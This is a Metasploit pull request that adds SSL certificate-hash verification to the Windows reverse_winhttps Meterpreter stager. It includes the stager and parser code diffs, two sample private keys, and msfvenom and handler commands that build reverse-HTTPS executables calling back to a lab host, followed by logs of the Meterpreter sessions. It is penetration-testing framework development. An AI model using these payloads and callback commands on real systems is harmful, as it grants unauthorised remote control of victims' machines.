### PR TITLE
SSL certificate verification for reverse_winhttps stager

### DIFF
--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -187,7 +187,7 @@ module Payload::Windows::ReverseWinHttp
 
       WinHttpOpenRequest:
 
-        push.i32 #{"0x%.8x" % http_open_flags}
+        push #{"0x%.8x" % http_open_flags}
         push ebx               ; AcceptTypes (NULL)
         push ebx               ; Referrer (NULL)
         push ebx               ; Version (NULL)

--- a/lib/msf/core/payload/windows/reverse_winhttp.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttp.rb
@@ -307,7 +307,7 @@ module Payload::Windows::ReverseWinHttp
             db #{encoded_cert_hash}
 
           ssl_cert_compare_hashes:
-            pop ebx              ; ebx points to our internal 20-byte certificate hash (overwites *pCert)
+            pop ebx              ; ebx points to our internal 20-byte certificate hash (overwrites *pCert)
                                  ; edi points to the server-provided certificate hash
 
             push.i8 4            ; Compare 20 bytes (5 * 4) by repeating 4 more times
@@ -389,6 +389,8 @@ module Payload::Windows::ReverseWinHttp
       end
     asm
   end
+
+
 
 end
 

--- a/lib/msf/core/payload/windows/reverse_winhttps.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttps.rb
@@ -79,7 +79,8 @@ module Payload::Windows::ReverseWinHttps
         port: datastore['LPORT'],
         url:  generate_small_uri,
         verify_cert: verify_cert,
-        verify_cert_hash: verify_cert_hash)
+        verify_cert_hash: verify_cert_hash,
+        retry_count: datastore['StagerRetryCount'])
     end
 
     conf = {
@@ -89,7 +90,8 @@ module Payload::Windows::ReverseWinHttps
       url:  generate_uri,
       exitfunk: datastore['EXITFUNC'],
       verify_cert: verify_cert,
-      verify_cert_hash: verify_cert_hash
+      verify_cert_hash: verify_cert_hash,
+      retry_count: datastore['StagerRetryCount']
     }
 
     generate_reverse_winhttps(conf)

--- a/lib/msf/core/payload/windows/reverse_winhttps.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttps.rb
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseWinHttps
     super
     register_advanced_options(
       [
-        OptBool.new('StagerVerifySSLCert', [true, 'Whether to verify the SSL certificate hash in the handler', false])
+        OptBool.new('StagerVerifySSLCert', [false, 'Whether to verify the SSL certificate hash in the handler', false])
       ], self.class)
   end
 
@@ -52,7 +52,7 @@ module Payload::Windows::ReverseWinHttps
     verify_cert = false
     verify_cert_hash = nil
 
-    if datastore['StagerVerifySSLCert']
+    if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i
       unless datastore['HandlerSSLCert']
         raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured"
       else
@@ -69,7 +69,7 @@ module Payload::Windows::ReverseWinHttps
     # Generate the simple version of this stager if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space
 
-      if datastore['StagerVerifySSLCert']
+      if datastore['StagerVerifySSLCert'].to_s =~ /^(t|y|1)/i
         raise ArgumentError, "StagerVerifySSLCert is enabled but not enough payload space is available"
       end
 

--- a/lib/msf/core/payload/windows/reverse_winhttps.rb
+++ b/lib/msf/core/payload/windows/reverse_winhttps.rb
@@ -2,6 +2,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/windows/reverse_winhttp'
+require 'rex/parser/x509_certificate'
 
 module Msf
 
@@ -16,6 +17,17 @@ module Msf
 module Payload::Windows::ReverseWinHttps
 
   include Msf::Payload::Windows::ReverseWinHttp
+
+  #
+  # Register reverse_winhttps specific options
+  #
+  def initialize(*args)
+    super
+    register_advanced_options(
+      [
+        OptBool.new('StagerVerifySSLCert', [true, 'Whether to verify the SSL certificate hash in the handler', false])
+      ], self.class)
+  end
 
   #
   # Generate and compile the stager
@@ -37,13 +49,37 @@ module Payload::Windows::ReverseWinHttps
   #
   def generate
 
+    verify_cert = false
+    verify_cert_hash = nil
+
+    if datastore['StagerVerifySSLCert']
+      unless datastore['HandlerSSLCert']
+        raise ArgumentError, "StagerVerifySSLCert is enabled but no HandlerSSLCert is configured"
+      else
+        verify_cert = true
+        hcert = Rex::Parser::X509Certificate.parse_pem_file(datastore['HandlerSSLCert'])
+        unless hcert and hcert[0] and hcert[1]
+          raise ArgumentError, "Could not parse a private key and certificate from #{datastore['HandlerSSLCert']}"
+        end
+        verify_cert_hash = Rex::Text.sha1_raw(hcert[1].to_der)
+        print_status("Stager will verify SSL Certificate with SHA1 hash #{verify_cert_hash.unpack("H*").first}")
+      end
+    end
+
     # Generate the simple version of this stager if we don't have enough space
     if self.available_space.nil? || required_space > self.available_space
+
+      if datastore['StagerVerifySSLCert']
+        raise ArgumentError, "StagerVerifySSLCert is enabled but not enough payload space is available"
+      end
+
       return generate_reverse_winhttps(
         ssl:  true,
         host: datastore['LHOST'],
         port: datastore['LPORT'],
-        url:  generate_small_uri)
+        url:  generate_small_uri,
+        verify_cert: verify_cert,
+        verify_cert_hash: verify_cert_hash)
     end
 
     conf = {
@@ -51,10 +87,29 @@ module Payload::Windows::ReverseWinHttps
       host: datastore['LHOST'],
       port: datastore['LPORT'],
       url:  generate_uri,
-      exitfunk: datastore['EXITFUNC']
+      exitfunk: datastore['EXITFUNC'],
+      verify_cert: verify_cert,
+      verify_cert_hash: verify_cert_hash
     }
 
     generate_reverse_winhttps(conf)
+  end
+
+  #
+  # Determine the maximum amount of space required for the features requested
+  #
+  def required_space
+    space = super
+
+    # SSL support adds 20 bytes
+    space += 20
+
+    # SSL verification adds 120 bytes
+    if datastore['StagerVerifySSLCert']
+      space += 120
+    end
+
+    space
   end
 
 end

--- a/lib/rex/parser/x509_certificate.rb
+++ b/lib/rex/parser/x509_certificate.rb
@@ -1,0 +1,62 @@
+# -*- coding: binary -*-
+
+require 'openssl'
+
+module Rex
+module Parser
+
+###
+#
+# This class parses the contents of a PEM-encoded X509 certificate file containing
+# a private key, a public key, and any appended glue certificates.
+#
+###
+class X509Certificate
+
+  #
+  # Parse a certificate in unified PEM format that contains a private key and
+  # one or more certificates. The first certificate is the primary, while any
+  # additional certificates are treated as intermediary certificates. This emulates
+  # the behavior of web servers like nginx.
+  #
+  # @param [String] ssl_cert
+  # @return [String, String, Array]
+  def self.parse_pem(ssl_cert)
+    cert  = nil
+    key   = nil
+    chain = nil
+
+    certs = []
+    ssl_cert.scan(/-----BEGIN\s*[^\-]+-----+\r?\n[^\-]*-----END\s*[^\-]+-----\r?\n?/nm).each do |pem|
+      if pem =~ /PRIVATE KEY/
+        key = OpenSSL::PKey::RSA.new(pem)
+      elsif pem =~ /CERTIFICATE/
+        certs << OpenSSL::X509::Certificate.new(pem)
+      end
+    end
+
+    cert = certs.shift
+    if certs.length > 0
+      chain = certs
+    end
+
+    [key, cert, chain]
+  end
+
+  #
+  # Parse a certificate in unified PEM format from a file
+  #
+  # @param [String] ssl_cert_file
+  # @return [String, String, Array]
+  def self.parse_pem_file(ssl_cert_file)
+    data = ''
+    ::File.open(ssl_cert_file, 'rb') do |fd|
+      data << fd.read(fd.stat.size)
+    end
+    parse_pem(data)
+  end
+
+end
+
+end
+end

--- a/lib/rex/socket/ssl_tcp_server.rb
+++ b/lib/rex/socket/ssl_tcp_server.rb
@@ -2,6 +2,7 @@
 require 'rex/socket'
 require 'rex/socket/tcp_server'
 require 'rex/io/stream_server'
+require 'rex/parser/x509_certificate'
 
 ###
 #
@@ -108,25 +109,7 @@ module Rex::Socket::SslTcpServer
   # @param [String] ssl_cert
   # @return [String, String, Array]
   def self.ssl_parse_pem(ssl_cert)
-    cert  = nil
-    key   = nil
-    chain = nil
-
-    certs = []
-    ssl_cert.scan(/-----BEGIN\s*[^\-]+-----+\r?\n[^\-]*-----END\s*[^\-]+-----\r?\n?/nm).each do |pem|
-      if pem =~ /PRIVATE KEY/
-        key = OpenSSL::PKey::RSA.new(pem)
-      elsif pem =~ /CERTIFICATE/
-        certs << OpenSSL::X509::Certificate.new(pem)
-      end
-    end
-
-    cert = certs.shift
-    if certs.length > 0
-      chain = certs
-    end
-
-    [key, cert, chain]
+    Rex::Parser::X509Certificate.parse_pem(ssl_cert)
   end
 
   #


### PR DESCRIPTION
This PR adds support for SHA1-hash verification of the handler's SSL certificate inside the reverse_winhttps stager. If the `StagerVerifySSLCert` parameter is set to true, the stager will exit early if the SHA1 hash of the certificate sent by the Metasploit listener does not match the hash of the certificate set in the `HandlerSSLCert` parameter. 

This prevents a man-in-the-middle attack on the stager's connection, assuming that the stager is delivered out-of-band where its embedded hash can't be tampered with. The logical next step would be to update the Meterpreter payload to support WinHTTP and enable hash checking.

Testing this requires two SSL certificates in unified PEM format (containing both the private key and the certificate). The example below demonstrates how to do this with `msf_irb_shell` but any pair of certificates works (self-signed or otherwise).

```

$ ./tools/msf_irb_shell
>> c1 = Rex::Socket::SslTcpServer.ssl_generate_certificate
>> File.open("correct.pem", "wb"){|fd| fd.puts c1[0].to_s; fd.puts c1[1].to_s }
>> c2 = Rex::Socket::SslTcpServer.ssl_generate_certificate
>> File.open("incorrect.pem", "wb"){|fd| fd.puts c2[0].to_s; fd.puts c2[1].to_s }
>> exit
```

Alternatively, just use the two static certificates below:

```
$ cat correct.pem 
-----BEGIN RSA PRIVATE KEY-----
MIIEpgIBAAKCAQEA0pDFIQL20fIj8W+0RtgeK6vw8aXn7VwcbiWUYAIcsh2ozyxp
cUYmPqN0dZahEcwqvzf/YpN+dMOIJDD7tIS+THvdzqpRGWUIy2zvTrBoagKuNuTE
lN7wbns0P6dsr7vae3q/ZQnyfTS8NjEZn4r3G/z9k1sBT76bfSj3xvQJF2ZevNuX
7FI1icOoPrljQzfuvWmw8zc3rpTNM47nE4OMzgps1cRoGA67w4iMkTb6qC7hXM9x
TQw87v3qcjvFIFdP0fse/4xjMWD2QOnMtL6msi0pYdwGPIXiARS8X70e7KQFW48z
YcXdLCx89VValxpUMmtd4M7MEEwOb+rDgjr+pwIDAQABAoIBAQCgfspSxDCfi+IL
qCoQCbDNdsw7VEq4aAofhrNWjqWSufqultp0BZUnD224Jyz0JNu8TpFxcJzloRhH
BbMFQFzQbWV+neEc6x7N92VcZCfiDdL+clbIZjl67JvBnPrB4/y/O6tg9zkGaEjB
QaGXMtPxWF9rjuUsBEv+FVjvI5k+ZF1+M+pxmcR7lx/jIYV4tMcS6NxyLPXXU6Ls
o69g/lQPvR5yQly2WF3ivUmymSc3IzvfVKMuRMydxW9QgUJleC6/vPbwAC651Df7
dxlpHPjltBLP8+YORTMf49YN4RAxcBr7tNLW7vW77BwNSeImHZUnNHeFgz8+kLqR
CWIC7L6pAoGBAPVV80FMIcIf279BMfUVrUteLFb772jjcxtle895W3pICGi25X3A
SFkLyntYFN2y0L/PUfa/7oOfbKWmJd5FwwLkDN64h5eVQlQhiIm6shPuG5AlNwJG
7xzdnWz+ycdkLTpmU3kbUzySIruGAx3/7b2taez35NIdw+94Mh5FAvylAoGBANu3
5zkVacq/vlR8uZLZlJTZkxKKikA+xprRmjp5G6uGSJ/4LztPtUR9s/gaFn8BRoVe
+YW1XITTGxr6oE7nhYjn0sdSWA319o7lWJigceFxma96fLv+64B0jRXw88MEtrUW
EFp/rCkGY0aq9YV4dmeKm+eKCMca48mzwEasp3BbAoGBAO8otXSvEa2avu4HUPr5
AbEaAaFeATm/mENZv8M2K43d0Iy71qWqnxxnGSD6cYTZPxPst5sR6SJYdGJawEmY
ug0EYONxAYUsVLeM5PxWiihRkn8HOEO5AHmkNEW/btY3+rsWa0MA9zhxwPgLINjK
12hzN3JxCZgmug2knz7QyaOdAoGBAIK76y3xCtCjxIka6YRySFFFIJiQrHBLqfqm
quEN/KPTs9TTZK8i31WQggwm4anSRXbIKyoe3pz9y4wDAm3Qnoj2f1kwKsqrxngC
CPRPy1L8OBjMhfmKVfBJ6UTb6P7qCBi5tyNSAksqzNlYkdxH8BPtypQ7crudyVnT
xZ2Hz90vAoGBAMpXDXWQV0E8YydcViwyfAHxPNlz/y1oX9pigjDDU5DqneDQvKBk
sbUsjgqLRvvk0MHqJbWxQID28DiJAcquarvLR2K7Q07jWUZw/EMJ5K5TkPwzybJM
Gff/A8ocmocwtcjHZIV3JGV1xnSHUy8W24xe0t5HPi71nsDMJRQ6Dzq5
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIICtzCCAZ+gAwIBAgIIfK2e+3ROwNgwDQYJKoZIhvcNAQELBQAwFDESMBAGA1UE
AwwJY290cmVydXBhMB4XDTEyMDcxNTE1MzEyOVoXDTIyMDcxMzE1MzEyOVowFDES
MBAGA1UEAwwJY290cmVydXBhMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
AQEA0pDFIQL20fIj8W+0RtgeK6vw8aXn7VwcbiWUYAIcsh2ozyxpcUYmPqN0dZah
Ecwqvzf/YpN+dMOIJDD7tIS+THvdzqpRGWUIy2zvTrBoagKuNuTElN7wbns0P6ds
r7vae3q/ZQnyfTS8NjEZn4r3G/z9k1sBT76bfSj3xvQJF2ZevNuX7FI1icOoPrlj
QzfuvWmw8zc3rpTNM47nE4OMzgps1cRoGA67w4iMkTb6qC7hXM9xTQw87v3qcjvF
IFdP0fse/4xjMWD2QOnMtL6msi0pYdwGPIXiARS8X70e7KQFW48zYcXdLCx89VVa
lxpUMmtd4M7MEEwOb+rDgjr+pwIDAQABow0wCzAJBgNVHRMEAjAAMA0GCSqGSIb3
DQEBCwUAA4IBAQDPknpC6A+EO6g/amxhWOUywB3lNRQrWuDZxmbG4uUcNCt8TmHT
NubhBHscQLsG+MaiI8fPBbj4MRBuAqUu3kMW7vVg4TBx0nj7rOMvl6M1bJoXiWnv
u1TTWpFpUGlr/DinOsknEtfsuL1b7D++B9NQSvCmaCJn5GxH/dMB6DDqQq+m9Kok
wsp7c3qD/anAdaa3o2MO2hQAZKT0RTOlS+7wDtHi+/jUL6V3+QIJB4kIdIXMYZNc
xcn0+bhQmJQi1got7l6LME5jDcGUC5Ct7+h3J9TPhNcwUSPvOZHjcZBXjDJqE/HM
JfPkQ9E5+bBaN5OaMM1DB1ybEqTkLSWbnrYs
-----END CERTIFICATE-----
```

```
$ cat incorrect.pem 
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAy07w//fhH2PyWcZPRjUBe6gY4bfXnLD45zr5i8C1PtzR8hB4
GfE3wkM9SeSqpe/7Lrgyzek7sGhFRK3y8LQUsucX7gruVzpOgyCBH3FD7RP35yTz
Nms/GVYZjDcLfm6e+TSaIOhH4mcf/yUu06go6SZXMW0vS/XNGl6bjCwgPKVZn+uG
8FakFkM9/vHjRrGsShODEjm9cKmI7atq0Pp/FugabeAFNHMesLYgF/d5okTQ8cJG
sehLkuy+2soptrhoUVFWUiEcVeYEMBuKM222ItB7fUnwwLyuE01swWJ9ubX6G5qg
g7avFjUfifGbqM1pVdicholQP2JfarcpTSnCUwIDAQABAoIBAGFpdI2gjkwFDnS3
UPp5oTlHhIx6EqPwI4JfPnwYnH7/PNS30WPUsPuyTeZe2ujhAEAVX7pLWx8eBrpu
gi2UiyphEZUrxaEjvcSUSWnwUjSA0dH9YU8cucIBAAKvySEODbun2YWU5gRzluAg
R7yAIQH9Ld/vya6immBdHjheWB/V2oTUdMU7nobOnFfVobb3p1zNnKRsbIMn/xHG
hpE++SyGG0LnM++me5nghaL8bRjSVcBgqGGDQKzr/K4FD95rnQs/sPE0rOYpKoqh
2DmISk7gku2PtgIGW+N5uDoW6/495yVN4kqWldGrdp80DYuJkQ2/1fTKmU9OHCM7
SYr1ikkCgYEA+bie7RoyJvkoqtj4F8S5YzTeoTaiAEVrm4wQpyHqnTKZZleZwU4k
KH3jN+1aUDnrMCQEVY1oPXiLxeg/5UaaAnvGCeap99pj3tNO7ruaT0McddJZFrs9
TsaJ/utzm7JqyQOVwWv2e+flViBo/4o+DcLbibkAVMZZ6FdDwa9wfh0CgYEA0GuT
UeRsN6I6ApD+x6WJZBrhiNbUwOoVBhf7TgTlfEP52lbGLDvbxYAFFxSgNcws3Zuw
lPGAIH5wQPFqyoDvAtR8iFegBNGuT6CTrcaXkjhKV2vE67b8JguiqoiMITW5QcfQ
PdSTBeQe4pLrPfwMkZtpPqBMxkUIRiY/S42GFy8CgYEAtHijipEq+5WHuWkSawMG
Q9caqgG0tGN3MDPaeR7+0lqWGCto+BXD9et8wZdsdJxXBzSQWU/XrM0onn+JZeZP
OUpARjmITpJrKMcnvUqha3UB5Xh+X/ozhXHgmvWIWFZp7BoGKYIf4U4nJMZJe5xp
2kIfrPmhbqLmqQ4f7qMetlUCgYEA0C9UdY2chynVljCtPlFc3pB3Tg+Bbr2jiHW2
AaWkcS8ZSP46b37PNQV+kCJ7MaGkAyx8AxsEJ/EEQeqkCGkn1YTYa/xTC91Cp6k3
OnLPfjAaGh69EdKzJXGj54IDrzyRs2Ja4RgQT+cg7qNgtYaqK1u4keTfK4FTFXco
7FgOY+MCgYBmajYbO0c/kuvzn5SUsfkxAosyQKN+oRKD074kI7Nv3bo7avKfQmxV
0xNYV3zAtFpxNpQF6HJ8zrYhmyC2ZUVktJD+RxkaD/TzbbHF+FKoVe8skpn1ycAh
tBYDT8Py1mViycd5iC6LKZh30BZD2vFWAXBLENdBpoRuLFC/I9u67A==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIICtDCCAZygAwIBAgIJANalKyXdm0wrMA0GCSqGSIb3DQEBCwUAMBIxEDAOBgNV
BAMMB3Ztd3JwY3gwHhcNMTQwMTI0MjAzNTE5WhcNMjQwMTIyMjAzNTE5WjASMRAw
DgYDVQQDDAd2bXdycGN4MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
y07w//fhH2PyWcZPRjUBe6gY4bfXnLD45zr5i8C1PtzR8hB4GfE3wkM9SeSqpe/7
Lrgyzek7sGhFRK3y8LQUsucX7gruVzpOgyCBH3FD7RP35yTzNms/GVYZjDcLfm6e
+TSaIOhH4mcf/yUu06go6SZXMW0vS/XNGl6bjCwgPKVZn+uG8FakFkM9/vHjRrGs
ShODEjm9cKmI7atq0Pp/FugabeAFNHMesLYgF/d5okTQ8cJGsehLkuy+2soptrho
UVFWUiEcVeYEMBuKM222ItB7fUnwwLyuE01swWJ9ubX6G5qgg7avFjUfifGbqM1p
VdicholQP2JfarcpTSnCUwIDAQABow0wCzAJBgNVHRMEAjAAMA0GCSqGSIb3DQEB
CwUAA4IBAQCt+46wYXJn3MSYKPhSX/+ZnIbpaLFt+w0o+NzZgSvEV2jtGT+gykF3
QuAaFAXolUvvu66wMdpN1g1Z7GEVSBCi7RoVF4Ctq3/WA7qoGNMiwyG1gq4g3xqs
cEUZBGXH/oLAsp+fGEYmWgtpvANeZorOm026nAG3h9co1noOVYrT2QuIpv8puqBj
Ji47LrcbRqAaCBrpBHbtXLEWYq3TSYHVshrFoWkxERmAkumw9MZQz5PNVqn11SAZ
CMp5tbkdB1oMw0i1nRTgn2xncom1L8zwMqsOqnN22oulVRPGKf7nBGtpj99AvCkD
jVbd8DxjPeJ4kmz0FOCilpJ7pb0W4cB9
-----END CERTIFICATE-----
```

Create two versions of the payload, one configured for the correct.pem, the other for the incorrect.pem:

```
$ ./msfvenom -p windows/meterpreter/reverse_winhttps -f exe EXITFUNC=process StagerVerifySSLCert=true LHOST=192.168.0.4 LPORT=4444 HandlerSSLCert=./correct.pem -o /scratch/reverse_winhttps_verify_correct.exe

$ ./msfvenom -p windows/meterpreter/reverse_winhttps -f exe EXITFUNC=process StagerVerifySSLCert=true LHOST=192.168.0.4 LPORT=4444 HandlerSSLCert=./incorrect.pem -o /scratch/reverse_winhttps_verify_incorrect.exe
```

Create a handler with the correct SSL certificate configured for `HandlerSSLCert`:

```
$ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_winhttps; set LHOST 192.168.0.4; set LPORT 4444; set HandlerSSLCert correct.pem; set StagerVerifySSLCert true; set ExitOnSession false; run -j'
[*] Stager will verify SSL Certificate with SHA1 hash a45e0c8f61f31d505f1bfff5f1b790c089fc0941
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
```

Verify that the session loads by executing the EXE with the correct certificate hash baked into it:

```
[*] 192.168.0.4:55173 Request received for /jlEGtAupETsiLzd4B3vcxv0PrhogOmiEwDqrntPiDxA4N67qldOou14rr9wgh32pdxws8FAJZQGCy6xrlIsN35unBFTYRUapAgzDrhNWLKD2AwmKyQy86gBgn24SHX8WCKp5DcxPc6G4lnnxEHcjSc0EDufXt1MCaXgUjVZLDGoBL7ASPYqSR2fkseYNEcdcF6aAVdTEOIHbTrYTyrxmKBPcrao...
[*] 192.168.0.4:55173 Staging connection for target /jlEGtAupETsiLzd4B3vcxv0PrhogOmiEwDqrntPiDxA4N67qldOou14rr9wgh32pdxws8FAJZQGCy6xrlIsN35unBFTYRUapAgzDrhNWLKD2AwmKyQy86gBgn24SHX8WCKp5DcxPc6G4lnnxEHcjSc0EDufXt1MCaXgUjVZLDGoBL7ASPYqSR2fkseYNEcdcF6aAVdTEOIHbTrYTyrxmKBPcrao received...
[*] Meterpreter session 1 opened (192.168.0.4:4444 -> 192.168.0.4:55173) at 2015-03-14 16:31:41 -0500

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: grunt\hdm
```

Run the EXE with the incorrect certificate hash and verify that it doesn't stage:

```
[*] 192.168.0.4:55334 Request received for /qCiCaV3sAmdIEFguNor0MsGtho8RsHHC04Ev4bwwVPhE5OAtsehYjMfYj92TLItxq2axiJX1iJgHLiQAFVyoIhfPN75Wo6OWOWSmRllU71IvscDSXnF4E0LmR8ruDOepQ0h95UBG2xqVZr1li3dnF5PJuMn7ypn32SSAQ7W0APU4IelBBNs8r4vUapPwlwCMHdhCYXq6Q7xYhOAtnQv29SUmms1xH2gc7dLW...
[*] 192.168.0.4:55334 Staging connection for target /qCiCaV3sAmdIEFguNor0MsGtho8RsHHC04Ev4bwwVPhE5OAtsehYjMfYj92TLItxq2axiJX1iJgHLiQAFVyoIhfPN75Wo6OWOWSmRllU71IvscDSXnF4E0LmR8ruDOepQ0h95UBG2xqVZr1li3dnF5PJuMn7ypn32SSAQ7W0APU4IelBBNs8r4vUapPwlwCMHdhCYXq6Q7xYhOAtnQv29SUmms1xH2gc7dLW received...
[*] Meterpreter session 2 opened (192.168.0.4:4444 -> 192.168.0.4:55334) at 2015-03-14 16:34:41 -0500

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > 
meterpreter > getuid
[-] Unknown command: getuid.
```

Swapping out the handler to use the incorrect certificate should cause the first EXE to not stage and allow the second EXE to stage. This feature is not enabled by default and is backwards compatible with the previous winhttp stagers.
